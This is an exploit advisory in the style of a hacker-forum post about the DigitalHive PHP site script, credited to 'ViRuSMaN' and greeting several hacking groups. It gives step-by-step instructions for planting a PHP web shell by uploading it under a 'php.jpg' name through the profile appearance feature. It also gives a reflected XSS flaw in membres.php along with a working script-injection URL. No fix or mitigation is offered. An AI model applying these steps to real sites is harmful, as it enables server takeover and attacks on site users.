[-]##############################################################
|
| DigitalHive Remote File Upload Vulnerability
|
| Author : ViRuSMaN
|
| Contact : v.-m@live.com
|
| Home : Islam-Attack.CoM , HackTeach.OrG
|
| Download :http://www.digitalhive.com/base.php?page=site/telechargements.php&var=accueil
[-]##############################################################
|
| Exp:
|
| 1- First signup in the forum by going here http://localhost/[script]/base.php?page=inscription.php
|
|
| 2-Then going to your profile here http://localhost/[script]/base.php?page=compte.php&var=accueil and click "modfier"
|
|
| 3-Now upload your shell in "php.jpg" format
|
|
| 4-Finally do a right click in the icon situated in "Apparence" then copy the link of your shell.
|
[-]#############################################################
|
|Greets : All members of islam-attack.com , hackteach.org , s3curi7y.com & All Muslim's
|
[-]#############################################################
==============================================================================
[»] DigitalHive Multiple Vulnerabilities
==============================================================================
[»] Script: [ DigitalHive ]
[»] Language: [ PHP ]
[»] Site page: [ Hive est systeme permettant de creer facilement et rapidement un systeme ]
[»] Download: [ http://www.digitalhive.com/base.php?page=site/telechargements.php&var=dl&num=17 ]
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & Sec-Attack.Com ]
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
###########################################################################
===[ Exploit ]===
[»] http://server/[path]/base.php?page=membres.php&mt=[Xss Vuln]
===[ Live Demo ]===
[»] http://server/base.php?page=membres.php&mt=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
Author: ViRuSMaN <-
